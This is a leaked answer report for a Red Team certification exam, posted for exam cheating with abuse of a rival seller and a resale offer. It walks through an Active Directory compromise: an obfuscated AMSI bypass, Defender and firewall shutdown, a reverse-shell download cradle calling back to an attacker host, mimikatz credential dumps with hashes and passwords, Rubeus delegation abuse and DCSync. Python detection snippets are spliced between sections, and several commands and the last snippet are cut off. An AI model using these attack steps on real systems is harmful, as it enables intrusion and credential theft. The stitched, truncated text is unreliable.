Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord

Hi,

It's maze runner with another leak. This time I bring you the New CRTE Exam Report
(CITADEL.CORP and GLACIS.CORP).

Reason For Leak : The mf from exam market selling it for 400,500 vice versa. Especially the
guy Marble_cig11, I don't like this kinda cunt people. Listen Marble idiot, Don't drag any other
sellers into your sale, You can say you have the best report but doesn't mean you are the one
who has best in the world, You're just another piece of shit for me. If you do it again then
next leak will be your CRTO and PACES report and Your Fake Cobalt Strike, already got those
two waiting for leak.

How this idiot lied to their customers,

CRTE - "I took 8 times CRTE exam to make this report ", "I have the real report, others just
reselling mine", "Me and other shit guy are real, rest of the sellers are scammers." and
finally "I used POM as a MM blah blah"

CRTO - "You need to compile CS binary in VS to evade AV", "Daily having Exams", "blah
blah"

Finally these are the ultimate I own Everything.., If you give me positive rep I'll give you 30
rep.

This guy lies a lot, Don't know about cooling period in CRTE. Besides this Report is same as
the other guy in the market.

Leaks Contributors so far (aka Legends):

1. @leopard_00
2. @MrXmen
3. @samy_le
4. @whoami.01
5. @rangnarok
6. @Adispy
7. @omegade

If you want to buy the Reports for Cheap Price DM me on Discord

maze_runner#0964
CRTE EXAM REPORT
Introduction
An Active Directory Security Assessment has been conducted on the given Active
Directory environment, assuming an attacker has already obtained an initial foothold in the
target environment as per the given scope. Social engineering and DDoS testing
are out of scope for the penetration test. This document is confidential and only
higher authorities of the company are entitled to read it.

Scope of Engagement
Machines provided in the examination dashboard:

ExamVM - Foothold machine
SRV71 - Access obtained
SQLSRV3 - Access obtained
GLACIS-DC - Access obtained
PAWSRV - Access obtained
CITADEL-DC - Access obtained

The above lists the machines given in the network. I already had initial foothold
access in the given network through EXAMVM. I need to get command execution on
all the machines present in the network.

Intended Audience
The document is prepared for Pentester Academy L.L.C as part of the Certified Red
Team Expert examination.

Executive Summary
Testing was performed in a controlled environment. I confirm I was successfully able
to achieve OS command execution on all the machines in the network.

CRTE EXAM REPORT 1


The most used commands, listed here so that I do not repeat them throughout the report, are:

AMSI Bypass :

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Disable Defender and the firewall :

Set-MpPreference -DisableIOAVProtection $true

Set-MpPreference -DisableRealtimeMonitoring $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Or in cmd :

netsh advfirewall set allprofiles state off
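The commands above are exactly what PowerShell script block logging on the host records. As an added example (not from the report), the following Python detector runs over a few constructed Event ID 4104 script texts and flags the Defender and firewall tampering shown above, plus the backtick and string-splice obfuscation style the AMSI one-liner uses; the regexes, threshold and sample lines are my own.

```python
import re
from typing import Dict, List

# Tampering commands as they appear in the report, matched case-insensitively.
TAMPERING_PATTERNS = {
    "defender_realtime_off": re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I),
    "defender_ioav_off": re.compile(r"Set-MpPreference\b.*-DisableIOAVProtection\s+\$true", re.I),
    "firewall_profile_off": re.compile(r"Set-NetFirewallProfile\b.*-Enabled\s+False", re.I),
    "netsh_firewall_off": re.compile(r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    "defender_exclusion_added": re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I),
}

# Obfuscation markers: a backtick inside a word (S`eT-It`em) and 'a'+'b' splicing.
BACKTICK_IN_WORD = re.compile(r"[A-Za-z]`[A-Za-z]")
STRING_SPLICE = re.compile(r"'[^']*'\s*\+\s*'[^']*'")


def obfuscation_score(script: str) -> int:
    """Count obfuscation markers; crude, but legitimate scripts rarely use either."""
    return len(BACKTICK_IN_WORD.findall(script)) + len(STRING_SPLICE.findall(script))


def analyse_script_block(script: str, obfuscation_threshold: int = 3) -> List[str]:
    """Return the finding names for one logged script block (empty if clean)."""
    findings = [name for name, pat in TAMPERING_PATTERNS.items() if pat.search(script)]
    if obfuscation_score(script) >= obfuscation_threshold:
        findings.append("obfuscated_powershell")
    return findings


def scan_blocks(blocks) -> Dict[int, List[str]]:
    """Map block index -> findings, keeping only the blocks that triggered."""
    return {i: f for i, b in enumerate(blocks) if (f := analyse_script_block(b))}


# Constructed sample of 4104 ScriptBlockText values, one block per entry.
SAMPLE_BLOCKS = [
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",        # benign read
    "Set-MpPreference -DisableIOAVProtection $true",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False",
    "netsh advfirewall set allprofiles state off",
    "Wr`ite-Ho`st (('he'+'llo')+(' wo'+'rld')) ; $x = ('a'+'b')",        # harmless but obfuscated
    "Get-ChildItem C:\\Windows -Filter *.log | Measure-Object",          # benign
]
```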

Vulnerability report :

EXAMVM

I had to transfer the AD module to the machine to be able to enumerate it, using the
Guacamole share (this is how I will transfer my files from now on).

Import the .dll module and the .ps1 module as in the training course material:

Import-Module Microsoft.ActiveDirectory.Management.dll

Import-Module \ActiveDirectory\ActiveDirectory.psd1

Now I will start enumeration for :

1. User ServicePrincipalName

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

2. Users

Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
Surname :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : 26bb7559-371b-461d-936a-fcd25c4fad8b
SamAccountName : Guest
SID : S-1-5-21-253487801-221673152-1815095224-501
Surname :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

DistinguishedName : CN=share manager,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName : share
Name : share manager
ObjectClass : user
ObjectGUID : e3cbc534-0d57-43b9-8911-1fa7f7385660
SamAccountName : sharemanager
SID : S-1-5-21-253487801-221673152-1815095224-1109
Surname : manager
UserPrincipalName : sharemanager

DistinguishedName : CN=sql connector,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName : sql
Name : sql connector
ObjectClass : user
ObjectGUID : 021fd657-6fa9-478b-8c8f-218a82499854
SamAccountName : sqlconnector
SID : S-1-5-21-253487801-221673152-1815095224-1110
Surname : connector
UserPrincipalName : sqlconnector

DistinguishedName : CN=GLACIS$,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : GLACIS$
ObjectClass : user
ObjectGUID : 2b70b2a3-5a9f-461d-830e-7d4906f3300c
SamAccountName : GLACIS$
SID : S-1-5-21-253487801-221673152-1815095224-1111
Surname :
UserPrincipalName :

DistinguishedName : CN=studentuser,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName : studentuser
Name : studentuser
ObjectClass : user
ObjectGUID : ec7c5a26-eb2c-4175-9917-216e1fbb1fbc
SamAccountName : studentuser
SID : S-1-5-21-253487801-221673152-1815095224-1113
Surname :
UserPrincipalName : [email protected]

3. Samaccountnames

Get-ADUser -Filter * -Properties *| select Samaccountname,Description

Samaccountname Description
-------------- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
krbtgt Key Distribution Center Service Account
sharemanager
sqlconnector
GLACIS$
studentuser

4. Computernames

Get-ADComputer -Filter *

DistinguishedName : CN=CITADEL-DC,OU=Domain Controllers,DC=citadel,DC=corp
DNSHostName : citadel-dc.citadel.corp
Enabled : True
Name : CITADEL-DC
ObjectClass : computer
ObjectGUID : aed36284-8dfd-458d-83af-befa42538a21
SamAccountName : CITADEL-DC$
SID : S-1-5-21-253487801-221673152-1815095224-1000
UserPrincipalName :

DistinguishedName : CN=PAWSRV,CN=Computers,DC=citadel,DC=corp
DNSHostName : pawsrv.citadel.corp
Enabled : True
Name : PAWSRV
ObjectClass : computer
ObjectGUID : 6031ac79-7b02-4996-bf53-91de6c0c6066
SamAccountName : PAWSRV$
SID : S-1-5-21-253487801-221673152-1815095224-1104
UserPrincipalName :

DistinguishedName : CN=EXAMVM,CN=Computers,DC=citadel,DC=corp
DNSHostName : examvm.citadel.corp
Enabled : True
Name : EXAMVM
ObjectClass : computer
ObjectGUID : d14c6ca8-f1aa-42a7-b14d-11b4287a3347
SamAccountName : EXAMVM$
SID : S-1-5-21-253487801-221673152-1815095224-1105
UserPrincipalName :

DistinguishedName : CN=SRV71,OU=Servers,DC=citadel,DC=corp
DNSHostName : srv71.citadel.corp
Enabled : True
Name : SRV71
ObjectClass : computer
ObjectGUID : a0b9d4b8-e51b-4421-a6dd-19500a851987
SamAccountName : SRV71$
SID : S-1-5-21-253487801-221673152-1815095224-1106
UserPrincipalName :

5. Members of Domain Admins

Get-ADGroupMember -Identity 'Domain Admins'

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500

6. Members of Enterprise Admins

Get-ADGroupMember -Identity 'Enterprise Admins' -Server citadel.corp

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
SourceName : citadel.corp
TargetName : glacis.corp
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional

7. Trusts

Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

8. Forests

Get-ADForest | %{Get-ADTrust -Filter *}

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
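The raw TrustAttributes value 8 and the Boolean flag fields above are what a reviewer has to interpret. As an added example (not part of the report), this Python snippet parses the Get-ADTrust key : value output into a dict, decodes TrustAttributes with the MS-ADTS trustAttributes bit values, and summarises the trust posture (SID filtering, selective authentication, TGT delegation). The sample text is copied from the output above; the flag table, the assessment logic and its reading of the SID-filtering rules are my own.

```python
from typing import Dict, List

# trustAttributes bit values from MS-ADTS, named as PowerView prints them.
TRUST_ATTRIBUTE_BITS = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",      # SID filtering quarantine (external trusts)
    0x008: "FOREST_TRANSITIVE",
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",
    0x040: "TREAT_AS_EXTERNAL",       # relaxes SID filtering on a forest trust
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

# Constructed sample: the trust object as Get-ADTrust printed it in the report.
SAMPLE_OUTPUT = """\
Direction : BiDirectional
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
Name : glacis.corp
ObjectClass : trustedDomain
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustType : Uplevel
UsesRC4Encryption : False
"""


def parse_trust_output(text: str) -> Dict[str, str]:
    """Turn 'Key : Value' lines into a dict; keys with no value map to ''."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def decode_trust_attributes(value: int) -> List[str]:
    """Expand the trustAttributes bitmask into flag names; unknown bits are kept."""
    flags = [name for bit, name in TRUST_ATTRIBUTE_BITS.items() if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTE_BITS)
    if unknown:
        flags.append(f"UNKNOWN_0x{unknown:x}")
    return flags


def assess_trust(fields: Dict[str, str]) -> Dict[str, object]:
    """Summarise the settings a reviewer of this trust would want to see."""
    flags = decode_trust_attributes(int(fields.get("TrustAttributes", "0")))
    forest = "FOREST_TRANSITIVE" in flags
    # My reading of MS-ADTS: forest trusts filter SIDs unless TREAT_AS_EXTERNAL
    # is set; external trusts rely on the QUARANTINED_DOMAIN bit instead.
    sid_filtering = (forest and "TREAT_AS_EXTERNAL" not in flags) or "QUARANTINED_DOMAIN" in flags
    notes = []
    if fields.get("SelectiveAuthentication") != "True":
        notes.append("selective authentication off: any authenticated user of the other forest can authenticate here")
    if fields.get("TGTDelegation") == "True" or "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION" in flags:
        notes.append("unconstrained delegation honoured across the trust")
    if "USES_RC4_ENCRYPTION" in flags:
        notes.append("trust keys restricted to RC4")
    return {
        "name": fields.get("Name"),
        "direction": fields.get("Direction"),
        "flags": flags,
        "forest_trust": forest,
        "sid_filtering_active": sid_filtering,
        "selective_auth": fields.get("SelectiveAuthentication") == "True",
        "tgt_delegation": fields.get("TGTDelegation") == "True",
        "notes": notes,
    }
```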

EXAMVM PRIVILEGE ESCALATION

Because I am a low-privilege user, I need to escalate my privileges.

I can run SharpHound on EXAMVM after transferring SharpHound.exe as usual.

SharpHound.exe -c All

!!!! → I made sure that on my personal PC I have the latest version of neo4j and
BloodHound, because the latest SharpHound.exe was updated a couple of weeks ago.

I used BloodHound on my personal PC, as recommended in the errata at the start
of the exam panel.

After importing the .zip file in BloodHound (on my personal PC) and checking
studentuser, I saw it has GenericWrite on the CompanyAdministrators group.

So the first thing is to add studentuser to that group and get admin rights:

net group "CompanyAdministrators" studentuser /add /domain

After that I logged out from EXAMVM.
Now I see that I have full rights and I can spawn CMD or PowerShell with admin
rights.

Dumping the hashes now on EXAMVM. Before doing this I disabled the AV/Defender
and AMSI protection with the commands stated above.
To be 100% sure, from CMD I started PowerShell with the bypass flag:

powershell -ep bypass

I also disabled all security on EXAMVM :

Set-MpPreference -DisableIOAVProtection $true

Set-MpPreference -DisableRealtimeMonitoring $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

I uploaded mimikatz.exe (x64) too, and dumped the hashes :

So now I have the NTLM hash of sharemanager:

NTLM → ad1b41d88cfd57b08f0fb50b1eee2541

GETTING IN SRV71

Having the NTLM hash of sharemanager, let's request a ticket to access SRV71.
We will use Rubeus.exe here:

.\Rubeus.exe asktgt /user:sharemanager /rc4:ad1b41d88cfd57b08f0fb50b1eee2541 /ptt

I checked now to see if it worked with :

klist

Imported PowerView.ps1 and did:

Find-DomainShare -CheckShareAccess

dir \\srv71.citadel.corp\ScheduledQueries

cd \\srv71.citadel.corp\ScheduledQueries

There is a Queries.ps1 file which, on examination, runs every 5 minutes.

Checking the content of the Queries.ps1 :

type Queries.ps1

# This PowerShell script runs every 5 minutes to check sqlsrv3 (192.168.37.3) status
Import-Module SqlServer
EXECUTE (
SELECT name AS [sqlsrv3DB],
DATABASEPROPERTY(name, N'Issqlsrv3') AS [sqlsrv3],
DATABASEPROPERTY(name, N'IsOffline') AS [Offline],
DATABASEPROPERTY(name, N'IsEmergencyMode') AS [Emergency],
has_dbaccess(name) AS [HasDBAccess]
FROM sysdatabases
WHERE (DATABASEPROPERTY(name, N'Issqlsrv3') = 1)
OR (DATABASEPROPERTY(name, N'IsOffline') = 1)
OR (DATABASEPROPERTY(name, N'IsEmergencyMode') = 1)
OR (has_dbaccess(name) = 0)
) AT SQLSRV3
GO
---snip-----
---snip-----

I can attempt to add a reverse shell to this script to get a shell on SRV71, so I
replaced its whole content with the following (note: the payload is the
powershelltcp.ps1 reverse shell from Nishang, where I added the last line with my
IP and the port on which I want to receive the reverse shell).

iex((new-object system.net.webclient).downloadstring('http://192.168.100.1/powershell.ps1'))

I uploaded nc64.exe and waited to catch the shell, which comes back every 5 minutes.

Now I am sqlconnector on SRV71.

Coming back to BloodHound I noticed SQLSRV3.GLACIS.CORP and GLACIS-DC.GLACIS.CORP.

Also these users → [email protected] and [email protected]

SQL SRV3

I disabled AMSI again (as sqlconnector), just to be sure, and loaded PowerUpSQL
to enumerate further.

PowerUpSQL includes functions that support SQL Server discovery, weak
configuration auditing, privilege escalation on scale, and post exploitation
actions such as OS command execution. It is intended to be used during internal
penetration tests and red team engagements. However, PowerUpSQL also includes
many functions that can be used by administrators to quickly inventory the SQL
Servers in their ADS domain and perform common threat hunting tasks related to
SQL Server.

I hosted PowerUpSQL.ps1 with HFS.exe:

iex((new-object system.net.webclient).downloadstring('http://192.168.100.1/PowerUpSQL.ps1'))

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN SYS.server_pri

With the last command I see that sqlconnector is sa (administrator), and we can
exploit this further.

I first enable xp_cmdshell on the SQL Server:

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "EXECUTE AS LOGIN = 'sqlsrv3adm';EXECUTE AS LOGIN = 'sa';EXEC sp_configure'show

Now with xp_cmdshell enabled, and being able to invoke commands (as nt
authority\system), for persistence I will add the studentuser account to the local
administrators group.

Get-SQLServerLinkCrawl -Instance sqlsrv3.glacis.corp -Query "EXECUTE AS LOGIN = 'sqlsrv3adm';EXECUTE AS LOGIN = 'sa';EXEC sp_configure'show

Next move is to get to SQLSRV3.
I will use "PowerShell on steroids" as I learned in the training, to make things easier
for me:

$passwd = convertto-securestring -AsPlainText -Force -String s88LBlxao4cK9U2OCzdbf; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "citadel\studentuser",$passwd; $session = new-pssession -computername SQLSRV3.GLACIS.CORP -credential $cred

Now I can invoke commands as studentuser on SQLSRV3.

SQLSRV3

Checking that I am studentuser on SQLSRV3:

Invoke-Command -Session $session -ScriptBlock {whoami;hostname}

From here I used SafetyKatz.exe (after uploading it to the share as usual) to dump
credentials on SQLSRV3:

Invoke-Command -Session $session -ScriptBlock {wget -uri http://192.168.100.1/SafetyKatz.exe -outfile Safetykatz.exe}

Invoke-Command -Session $session -ScriptBlock {.\Safetykatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"}

LOOT → dbmaster : 1a0693ca4d6482238e5e6f46c36950ea and password → 1SQLSrvAdmin!

From BloodHound, I see that dbmaster has AllowedToDelegate to GLACIS-DC.GLACIS.CORP.

Now I can impersonate Administrator using the hash of dbmaster.
First I need to create a new PowerShell-on-steroids session ($session2):

$passwd = convertto-securestring -AsPlainText -Force -String 1SQLSrvAdmin!; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "citadel\studentuser",$passwd; $session2 = new-pssession -computername SQLSRV3.GLACIS.CORP -credential $cred

Then on the new $session2:

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe asktgt /user:dbmaster /domain:GLACIS.CORP /ntlm:1a0693ca4d6482238e5e6f46c36950ea /outfile:masters5.tgt}

I successfully got the masters5.tgt file.

GLACIS-DC

My next move is to create the CIFS ticket:

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe s4u /ticket:masters5.tgt /msdsspn:time/glacis-dc.glacis.corp /impersonateuser:Administrator /domain:GLACIS.CORP /altservice:CIFS /ptt}

And it got successfully imported :

Now I will create a HOST ticket:

Invoke-Command -Session $session2 -ScriptBlock {.\Rubeus.exe s4u /ticket:masters5.tgt /msdsspn:time/glacis-dc.glacis.corp /impersonateuser:Administrator /domain:GLACIS.CORP /altservice:HOST /ptt}

This job also finished successfully.

Double checking if all went well using klist :

Invoke-Command -Session $session2 -ScriptBlock {klist}

I now have access to GLACIS-DC:

Invoke-Command -Session $session2 -ScriptBlock {dir \\glacis-dc.glacis.corp\c$}

My next move will be to use PsExec.exe to run commands on GLACIS-DC:

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp -s net localgroup Administrators}

I will disable real-time monitoring and AV, add an exclusion path for the C: drive, and
invoke "whoami" on GLACIS-DC:

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp -s powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Add-MpPreference -ExclusionPath 'C:\';whoami"}

Next I can create a scheduled task that will add dbmaster to the Administrators
group on GLACIS-DC:

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp cmd /c schtasks /create /S glacis-dc.glacis.corp /SC minute /RU "NT Authority\SYSTEM" /TN "adduser" /TR "cmd /c net localgroup administrators glacis\dbmaster /add"}

I double checked that it was truly successful:

Invoke-Command -Session $session2 -ScriptBlock {.\PsExec.exe \\glacis-dc.glacis.corp cmd /c "net localgroup administrators > c:\dbmaster.txt"}

Now that dbmaster is a local administrator, I can create a PSRemote session to
GLACIS-DC from SRV71 as the dbmaster user.
So I will open a new PowerShell-on-steroids session, called $session3:

$passwd = convertto-securestring -AsPlainText -Force -String 1SQLSrvAdmin!;$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "GLACIS.corp\dbmaster",$passwd; $session3 = new-pssession -computername glacis-dc.GLACIS.CORP -credential $cred

Double checking as usual:

Invoke-Command -Session $session3 -ScriptBlock {whoami;hostname}

PAWSRV

Checking BloodHound further, we see that GLACIS-DC.GLACIS.CORP is able to add
users to the pawadmins group.

Dumping hashes did not find anything of value, but we do see from our BloodHound
enumeration that PAWSRV has DCSync rights; we will need to add our studentuser
account to the local admin group on PAWSRV in order to attack this.

I can add studentuser to the local administrators group using a scheduled task.

I create a PowerShell script to add studentuser, and name it useradd.ps1:

$User = Get-ADUser -Identity "CN=STUDENTUSER,CN=USERS,DC=CITADEL,DC=CORP" -Server "CITADEL.CORP"; $Group = Get-ADGroup -Identity "CN=PAWADM

Then using $session2, I upload it and copy it to the GLACIS-DC root:

Invoke-Command -Session $session2 -ScriptBlock {wget -uri http://192.168.100.1/useradd.ps1 -outfile useradd.ps1}

Invoke-Command -Session $session2 -ScriptBlock {copy useradd.ps1 \\glacis-dc.glacis.corp\c$}

Then I create the scheduled task on GLACIS-DC:

Invoke-Command -Session $session3 -ScriptBlock {schtasks /create /S glacis-dc.glacis.corp /SC minute /RU "NT Authority\SYSTEM" /TN "adduse2" /TR "powershell -c C:\useradd.ps1; copy C:\useradd.ps1 C:\useradd2.ps1"}

I now verify that the studentuser account was added with PowerView (after importing
it, I will run the following command) :

Get-NetGroupMember -Identity "pawadmins"

I can now access PAWSRV from EXAMVM using Winrs

winrs -r:pawsrv powershell

CITADEL-DC

Using the winrm shell, I first disable all the security using the AMSI code and the
rest of the commands stated at the start of the report.

I can now use SafetyKatz to perform a DCSync attack. I winrs to PAWSRV and
dump all the hashes.

PS C:\Users\studentuser\Documents> .\SafetyKatz.exe "privilege::debug" "token::elevate" "lsadump::dcsync /user:CITADEL\Administrator" "exit"
[*] Dumping lsass (672) to C:\Windows\Temp\debug.bin
[+] Dump successful!
[*] Executing loaded Mimikatz PE
.#####. mimikatz 2.2.0 (x64) #19041 Sep 21 2021 15:08:31
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
580 {0;000003e7} 1 D 13985 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;001b61bc} 0 D 1917043 CITADEL\studentuser S-1-5-21-253487801-2216
73152-1815095224-1113 (11g,24p) Prim
* Thread Token : {0;000003e7} 1 D 1932307 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Imper
sonation (Delegation)
mimikatz(commandline) # lsadump::dcsync /user:CITADEL\Administrator
[DC] 'citadel.corp' will be the domain
[DC] 'citadel-dc.citadel.corp' will be the DC server
[DC] 'CITADEL\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/24/2022 9:19:12 AM
Object Security ID : S-1-5-21-253487801-221673152-1815095224-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2e52650081016fcefc5c2100ddf1566c
ntlm- 0: 2e52650081016fcefc5c2100ddf1566c
ntlm- 1: bcecf7d2efeb76139da904fb78158178
lm - 0: bebea018e95e9cbaab350c6e9f5a17e5
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 1fc33d58108520a64d25db5c4ad7d6e5
* Primary:Kerberos-Newer-Keys *
Default Salt : CITADEL.CORPAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f010371c54fa0ac5bb3fe2b37252641334ae3a7c21ecb2486f4f3eca8e22d176
aes128_hmac (4096) : a808ba766be3efb4d3c80d6de0fd7b5f
des_cbc_md5 (4096) : 6b52e33dbc948ccd
OldCredentials
aes256_hmac (4096) : 476acd473ba6f7ed90539e139c7c2832bb3501fff49d41831353efd15e6a766c
aes128_hmac (4096) : 60993e9f10913c80d50111232f722f6d
des_cbc_md5 (4096) : cd7f4c4a5d7aec9e
OlderCredentials
aes256_hmac (4096) : 5f1cf251cd62c9506b27e6ae518efdc63eeb6673c35186c26b102177979066c7
aes128_hmac (4096) : a5d261be5494386ed065897dc4ee0650
des_cbc_md5 (4096) : 0798da2315980d68
* Primary:Kerberos *
Default Salt : CITADEL.CORPAdministrator
Credentials
des_cbc_md5 : 6b52e33dbc948ccd
OldCredentials
des_cbc_md5 : cd7f4c4a5d7aec9e
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
mimikatz(commandline) # exit
Bye!

LOOT → Administrator : 2e52650081016fcefc5c2100ddf1566c
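The DCSync above runs as SYSTEM on PAWSRV after token::elevate, so on the wire it is the PAWSRV$ computer account pulling replication data, which is exactly what the domain controller's Directory Service Access audit (Event ID 4662) records. As an added example (not part of the report), this Python snippet flags 4662 events in which a principal other than a domain controller exercises the replication extended rights; the events are constructed, the DC allowlist is assumed from the report's computer enumeration, and the right GUIDs are the standard AD values.

```python
from typing import Dict, Iterable, List

# Extended rights that replication (and therefore DCSync) needs; standard AD GUIDs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask

# Assumed allowlist: the domain controllers from the report's computer enumeration.
# A real deployment also lists any legitimate replication service accounts here.
TRUSTED_REPLICATORS = {"CITADEL-DC$", "GLACIS-DC$"}


def replication_rights_in(properties: str) -> List[str]:
    """Names of the replication rights referenced in a 4662 Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


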